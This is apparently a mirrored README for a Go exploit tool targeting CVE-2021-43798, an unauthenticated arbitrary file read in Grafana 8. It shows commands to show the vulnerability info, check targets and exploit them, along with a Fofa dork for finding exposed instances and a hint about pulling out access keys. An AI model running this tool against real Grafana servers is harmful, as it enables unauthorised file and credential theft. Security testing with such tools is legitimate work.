## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZER0YU-CVE-2021-43798
# GrafanaArbitraryFileRead
## Uso
### 1\. Mostrar información
root@kitploit:~
❯ go run main.go -s
[INF] VulnInfo:
{
"Name": "Grafana Arbitrary File Read",
"VulID": "nil",
"Version": "1.0",
"Author": "z3",
"VulDate": "2021-12-07",
"References": [
"https://nosec.org/home/detail/4914.html"
],
"AppName": "Grafana",
"AppPowerLink": "https://grafana.com/",
"AppVersion": "Grafana Version 8.*",
"VulType": "Arbitrary File Read",
"Description": "An unauthorized arbitrary file reading vulnerability exists in Grafana, which can be exploited by an attacker to read arbitrary files on the host computer without authentication.",
"Category": "REMOTE",
"Dork": {
"Fofa": "app=\"Grafana\"",
"Quake": "",
"Zoomeye": "",
"Shodan": ""
}
}%
### 2\. Verificar
root@kitploit:~
echo vulfocus.fofa.so:55628 | go run main.go -v -t 20
http://vulfocus.fofa.so:55628
### 3\. Explotar
root@kitploit:~
echo http://vulfocus.fofa.so:51766 | go run main.go -m exploit -v
Realización de la idea de explotación de la referencia 1. Para extraer más información, modifique la expresión regular en la función getAccesskey.
## Referencia
1. Análisis de la última lectura arbitraria de archivos de Grafana y explicación de problemas derivados
2. Grafana Unauthorized arbitrary file reading vulnerability
## Descargo de responsabilidad
Este procedimiento es solo para autoinspección de seguridad, cumpla conscientemente con las leyes locales.